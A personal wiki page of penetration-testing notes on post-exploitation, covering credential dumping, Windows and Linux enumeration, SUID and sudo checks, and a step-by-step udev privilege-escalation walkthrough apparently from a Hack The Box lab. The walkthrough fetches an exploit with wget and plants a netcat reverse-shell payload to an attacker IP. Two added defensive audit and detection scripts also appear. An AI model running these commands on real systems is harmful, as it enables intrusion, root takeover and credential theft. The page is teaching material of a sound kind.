The gMan nixWiki

Because the mind is made of Teflon...

Post-Exploitation

Review

The six steps/stages of a PenTest…

  1. Pre-Engagement: Planning & Scope
  2. Recon: Information Gathering
  3. Scanning
  4. Exploitation
  5. Post-Exploitation
  6. Post-Engagement: Report

Overview

Outline of the Post-Exploitation Stage:

  1. Pivot
    1. Horizontal Movement: Lateral Moves
    2. Vertical Movement: Privilege Escalation
  2. Additional Recon
    1. Identify new targets previously not visible
    2. GOAL: Enumeration (build a list of new, potential targets not previously visible)
      • Users: usernames & passwords (cracking: most common post-exploitation attack)
      • Groups: for lateral movement and/or privilege escalation
      • Forest(s): in Active Directory (AD) environments
      • Sensitive Data: because that's why we are here… right?
      • Unencrypted Files: because they contain information we may be able to leverage
  3. Avoid Detection
  4. Exfiltration
  5. Clean-Up
    • Concealment
    • Retain Access

First Thing

After you've compromised a system, one of the first things you want to try is acquiring the local credential store (passwords).

Windows: The go-to tool is mimikatz (it can read hashes directly from memory).

Linux: The creddump package contains…

  1. cachedump: dumps cached credentials
  2. lsadump: dumps LSA Secrets
  3. pwdump: dumps password hashes

Linux password hashes are usually found in /etc/shadow.

  • You can simply copy that file to your attack machine and crack offline (if you have root).
  • Therefore, priv esc is a key part of acquiring credentials.

Local Enumeration

Once you have gained access to a machine, you need to enumerate (additional recon) to explore opportunities for additional movement (lateral or vertical).

Windows

Local Windows enumeration is not as straightforward as on Linux. Here are some examples…

## from cmd.exe, regular user: 

# Print OS name and version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# Display user accounts
net users

# Display info on particular user
net user Guest

# Network interface info: 
ipconfig

# Routing information 
route print

# IP/MAC mapping information
arp -a

# More...
netsh firewall show state  # check firewall state (deprecated; newer Windows: netsh advfirewall show allprofiles)
netsh firewall show config # check firewall settings
tasklist /SVC              # check tasks & services
net start                  # list running services
driverquery                # list installed drivers

# Find low-hanging fruit:
wmic qfe get Caption,Description,HotFixID,InstalledOn

Note: The Windows Management Instrumentation Command line (WMIC) is a software utility that allows users to perform Windows Management Instrumentation (WMI) operations from a command prompt.

Linux

Common Attack Vectors:

  • SUID/SGID files
  • Cron jobs
  • The kernel
  • Check to see if /etc/passwd and /etc/shadow are readable and/or writable by world.
  • Check sudo: sudo -l (if it hangs, it's waiting for a password; kill & reconnect)
  • You can also find backup files (.bak; might have login creds in them) and files owned by root but world readable and/or writable.

Privilege Escalation

Linux

SUDO

sudo is the “super user do” command.

  • It allows users to escalate their privileges based on settings in the /etc/sudoers file.
  • When the sudo command is called, the sudoers file is checked and rights are granted if they are permitted.

Therefore, always review the sudoers file after you gain access to a machine.

  • Figure out which accounts you want to target based on the rights they have.
  • Try to compromise accounts with sudo privilege.

One of the first commands you want to execute in order to abuse sudoer rights: sudo -l

  • This will list (“-l” is for “list”) the sudoers.
  • This shows you the user account names and privileges they have within the sudo environment.

SUID

SUID: Set User ID. SGID: Set Group ID

  • These are special bits of a file that tell Linux to run the executable as the owner (SUID) or as the group (SGID) of the file, not as the user who launched it.

To find all the files on a system that have the SUID bit set:

find / -perm -4000
# or
find / -perm /4000

# To see all the details:
find / -perm -u=s -type f 2>/dev/null
# or
find / -user root -perm -4000 -exec ls -ldb {} \;
# note: you need a space between {} and \;
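The checks from the Common Attack Vectors list and the SUID section above, pulled together into one read-only audit script as an added example (not the wiki's own code). It assumes GNU find/stat on Linux and builds a throw-away directory tree so it runs as an unprivileged user; point audit_root at / and check_auth_files at /etc to audit a real host.

```shell
#!/bin/sh
# Added example (not from the wiki): a read-only audit of the vectors listed
# above (SUID/SGID binaries, world-writable files, *.bak files, and the modes of
# /etc/passwd and /etc/shadow). Assumes GNU find/stat on Linux. Point audit_root
# at / on a real host; the demo below builds a throw-away tree so it runs as any user.

audit_root() {
    root="$1"
    # SUID or SGID bit set (-perm /6000 = either bit); the page's -4000 is SUID only
    find "$root" -xdev -type f -perm /6000 2>/dev/null | sed 's/^/SETID    /'
    # world-writable regular files: cron scripts or configs here are a priv-esc vector
    find "$root" -xdev -type f -perm -o=w 2>/dev/null | sed 's/^/WRITABLE /'
    # backup copies that may still hold credentials
    find "$root" -xdev -type f -name '*.bak' 2>/dev/null | sed 's/^/BACKUP   /'
}

# /etc/shadow must not be world-readable; neither file may be world-writable.
# Takes the directory holding passwd and shadow (normally /etc).
check_auth_files() {
    etc="$1"
    for f in passwd shadow; do
        [ -e "$etc/$f" ] || continue
        mode=$(stat -c '%a' "$etc/$f")          # e.g. 640
        other=$(( mode % 10 ))                   # last octal digit = "others"
        [ $(( other & 2 )) -ne 0 ] && echo "WORLD-WRITABLE $etc/$f ($mode)"
        [ "$f" = shadow ] && [ $(( other & 4 )) -ne 0 ] && echo "WORLD-READABLE $etc/$f ($mode)"
    done
    return 0
}

# Build a constructed tree with one of each finding (demo data, not a real host).
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/etc" "$d/home/bob"
    printf '#!/bin/sh\n' > "$d/usr/bin/helper"; chmod 4755 "$d/usr/bin/helper"  # SUID
    : > "$d/etc/shadow";  chmod 644 "$d/etc/shadow"                              # world-readable
    : > "$d/etc/passwd";  chmod 666 "$d/etc/passwd"                              # world-writable
    : > "$d/home/bob/db.bak"
    echo "$d"
}

tree=$(demo_tree)
audit_root "$tree"
check_auth_files "$tree/etc"
rm -rf "$tree"
```

On a real host the SETID list should be compared against a known-good baseline for the distribution; anything not in it is the interesting part.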

udevd

If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd…

Four local Linux exploits using udevd to escalate privileges to root:

  1. Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
  2. Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)
  3. Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)
  4. Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)

Walk-Through Video described below:

On the target machine, see if udev is running:

ps ax | grep udevd

On the target machine, check the version of udev; run:

dpkg -l | grep udev
# On HTB Lame I got version 117-8

Google the udev version or run searchsploit udev and see what comes up. The YouTuber referenced above liked the 8572.c exploit. Note: The Path column in the searchsploit results is relative to the local exploit database in: /usr/share/exploitdb/exploits/…

-------------------------------------------------------- ----------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ----------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <  | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb
-------------------------------------------------------- ----------------------

First, spin up a web server on your Kali box (your attack machine, your machine) so we can move the exploit over onto the target box:

service apache2 start   # or: systemctl start apache2

Copy the exploit file over to the web server subdir:

cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/

Check & Read:

  • cd into /var/www/html and make sure your file is there. Open it up with an editor and look at what it needs to run.
  • The Usage section of the file (at the top, scroll down) will tell you how to use the exploit.
    • Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually the udevd PID minus 1) as argv[1].
    • The exploit will execute /tmp/run (a text file named “run” that lives in the /tmp directory) as root so throw whatever payload you want in there.

From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget:

wget 10.10.14.11/8572.c  # that's the IP of your Kali/attack machine; the file you copied to /var/www/html/

Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So… build a text file…

touch run
echo '#!/bin/sh' >> run
echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run

When the udev exploit runs, it will execute netcat with the reverse shell going to your attack machine.

You need to compile that .c file you copied to the target machine:

gcc 8572.c -o 8572  # name it whatever you want

Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target:

nc -nvlp 5555  # make sure it's the same port number

Now the listener is waiting for a connection on the Kali attack machine…

Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine.

./8572 2687

You should have a reverse shell on your Kali machine with root privileges on the target machine. Done.
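From the defender's side, an added example (not from the wiki or the video) that looks for what the walk-through above leaves behind in a process listing: a root process executing a script out of /tmp, a netcat told to run a program with -e/-c, and a child of udevd that is not udevd. The snapshot it scans is constructed; the PIDs, the user bob and report.py are made up, and 10.10.14.11 is the address used above.

```shell
#!/bin/sh
# Added example (not from the wiki): hunt for the footprints the walk-through
# above leaves on a compromised host: a root process running a script from
# /tmp, netcat spawning a program (-e/-c), and a non-udevd child of udevd.
# Input is a `ps -eo user,pid,ppid,args` snapshot; the one below is constructed.
SAMPLE_PS='USER       PID  PPID COMMAND
root         1     0 /sbin/init
root       712     1 /sbin/udevd --daemon
root      2687   712 /sbin/udevd --daemon
root      4012  2687 /bin/sh /tmp/run
root      4013  4012 /bin/netcat -e /bin/sh 10.10.14.11 5555
bob       3901  3877 -bash
bob       3950  3901 /usr/bin/python3 report.py'

flag_procs() {
    awk '
    NR == 1 { next }                      # skip the ps header line
    {
        pid = $2; owner[pid] = $1; parent[pid] = $3; cmd[pid] = $4
        args = $4
        for (i = 5; i <= NF; i++) args = args " " $i
        line[pid] = args
    }
    END {
        for (p in cmd) {
            # Rule 1: root executing something out of a world-writable directory
            if (owner[p] == "root" && line[p] ~ /(^| )\/(tmp|var\/tmp|dev\/shm)\//)
                print "ROOT-TMP-SCRIPT pid=" p " " line[p]
            # Rule 2: nc/netcat/ncat told to run a program on connect
            if (cmd[p] ~ /(^|\/)(nc|netcat|ncat)$/ && line[p] ~ / -[ec] /)
                print "NC-EXEC pid=" p " " line[p]
            # Rule 3: udevd child that is not udevd (udev RUN+= helpers also
            # land here, so treat this as a lead to be tuned, not proof)
            if ((parent[p] in cmd) && cmd[parent[p]] ~ /udevd/ && cmd[p] !~ /udevd/)
                print "UDEVD-CHILD pid=" p " parent=" parent[p] " " line[p]
        }
    }'
}

# Scan the constructed snapshot; on a live host use:
#   ps -eo user,pid,ppid,args | flag_procs
scan_sample() {
    printf '%s\n' "$SAMPLE_PS" | flag_procs
}

scan_sample
```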


Windoze

LSA Secrets Registry

The LSA Secrets Registry contains the password of the currently logged-in user in an encrypted form.

  • You can find the LSA Secrets Registry here: HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
  • You can find the encryption key to the user's password in the parent key: HKEY_LOCAL_MACHINE\SECURITY\Policy

So, if you have admin access to the Windows Registry, you can recover the encrypted password and its key fairly easily.

method_5_post-exploitation.txt · Last modified: 2023/01/12 00:31 by gman